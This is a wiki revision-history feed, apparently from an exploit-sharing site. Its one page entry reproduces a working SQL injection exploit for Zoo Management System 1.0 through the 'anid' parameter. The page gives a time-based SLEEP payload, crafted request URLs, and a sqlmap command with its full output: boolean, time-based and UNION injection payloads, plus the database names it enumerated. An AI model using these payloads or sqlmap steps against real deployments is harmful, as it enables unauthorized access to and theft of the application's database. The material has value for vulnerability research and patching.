<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Zoo_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Zoo Management System 1.0 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Zoo_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Zoo_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T23:34:36Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Zoo_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1266&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; # Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Zoo_Management_System_1.0_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1266&amp;oldid=prev"/>
		<updated>2021-04-08T09:36:22Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; # Exploit Title: Zoo Management System 1.0 - &amp;#039;anid&amp;#039; SQL Injection # Google Dork: N/A # Date: 29/1/2021 # Exploit Author: Zeyad Azima # Vendor Homepage: https://...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Zoo Management System 1.0 - 'anid' SQL Injection&lt;br /&gt;
# Google Dork: N/A&lt;br /&gt;
# Date: 29/1/2021&lt;br /&gt;
# Exploit Author: Zeyad Azima&lt;br /&gt;
# Vendor Homepage: https://phpgurukul.com/&lt;br /&gt;
# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/&lt;br /&gt;
# Version: V1&lt;br /&gt;
# Tested on: Windows&lt;br /&gt;
&lt;br /&gt;
# Identify the vulnerability&lt;br /&gt;
&lt;br /&gt;
1- go to http://localhost/animals.php and click on an animal&lt;br /&gt;
&lt;br /&gt;
2- then add the following payload to the url&lt;br /&gt;
&lt;br /&gt;
payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND 'jMXh'='jMXh&lt;br /&gt;
url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh&lt;br /&gt;
&lt;br /&gt;
If the web server makes you wait 5 seconds then it's vulnerable&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Exploit&lt;br /&gt;
&lt;br /&gt;
Now you can exploit it using sqlmap&lt;br /&gt;
&lt;br /&gt;
command: sqlmap -u url --dbs&lt;br /&gt;
&lt;br /&gt;
example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 --dbs&lt;br /&gt;
       ___&lt;br /&gt;
       __H__&lt;br /&gt;
 ___ ___[.]_____ ___ ___  {1.4.10.16#dev}&lt;br /&gt;
|_ -| . [.]     | .'| . |&lt;br /&gt;
|___|_  [)]_|_|_|__,|  _|&lt;br /&gt;
      |_|V...       |_|   http://sqlmap.org&lt;br /&gt;
&lt;br /&gt;
[!] legal disclaimer: Usage of sqlmap for attacking targets without&lt;br /&gt;
prior mutual consent is illegal. It is the end user's responsibility&lt;br /&gt;
to obey all applicable local, state and federal laws. Developers&lt;br /&gt;
assume no liability and are not responsible for any misuse or damage&lt;br /&gt;
caused by this program&lt;br /&gt;
&lt;br /&gt;
[*] starting @ 23:05:33 /2021-01-29/&lt;br /&gt;
&lt;br /&gt;
[23:05:34] [INFO] resuming back-end DBMS 'mysql'&lt;br /&gt;
[23:05:34] [INFO] testing connection to the target URL&lt;br /&gt;
you have not declared cookie(s), while server wants to set its own&lt;br /&gt;
('PHPSESSID=ban6c541hos...n856fi447q'). Do you want to use those [Y/n]&lt;br /&gt;
y&lt;br /&gt;
sqlmap resumed the following injection point(s) from stored session:&lt;br /&gt;
---&lt;br /&gt;
Parameter: anid (GET)&lt;br /&gt;
    Type: boolean-based blind&lt;br /&gt;
    Title: AND boolean-based blind - WHERE or HAVING clause&lt;br /&gt;
    Payload: anid=9' AND 1925=1925 AND 'JrZo'='JrZo&lt;br /&gt;
&lt;br /&gt;
    Type: time-based blind&lt;br /&gt;
    Title: MySQL &amp;gt;= 5.0.12 AND time-based blind (query SLEEP)&lt;br /&gt;
    Payload: anid=9' AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND&lt;br /&gt;
'jMXh'='jMXh&lt;br /&gt;
&lt;br /&gt;
    Type: UNION query&lt;br /&gt;
    Title: Generic UNION query (NULL) - 8 columns&lt;br /&gt;
    Payload: anid=9' UNION ALL SELECT&lt;br /&gt;
NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL--&lt;br /&gt;
-&lt;br /&gt;
---&lt;br /&gt;
[23:05:36] [INFO] the back-end DBMS is MySQL&lt;br /&gt;
web application technology: Apache 2.4.41, PHP 7.3.10, PHP&lt;br /&gt;
back-end DBMS: MySQL &amp;gt;= 5.0.12&lt;br /&gt;
[23:05:36] [INFO] fetching database names&lt;br /&gt;
available databases [6]:&lt;br /&gt;
[*] information_schema&lt;br /&gt;
[*] mysql&lt;br /&gt;
[*] performance_schema&lt;br /&gt;
[*] sys&lt;br /&gt;
[*] umspsdb&lt;br /&gt;
[*] zmsdb&lt;br /&gt;
&lt;br /&gt;
[23:05:36] [INFO] fetched data logged to text files under&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>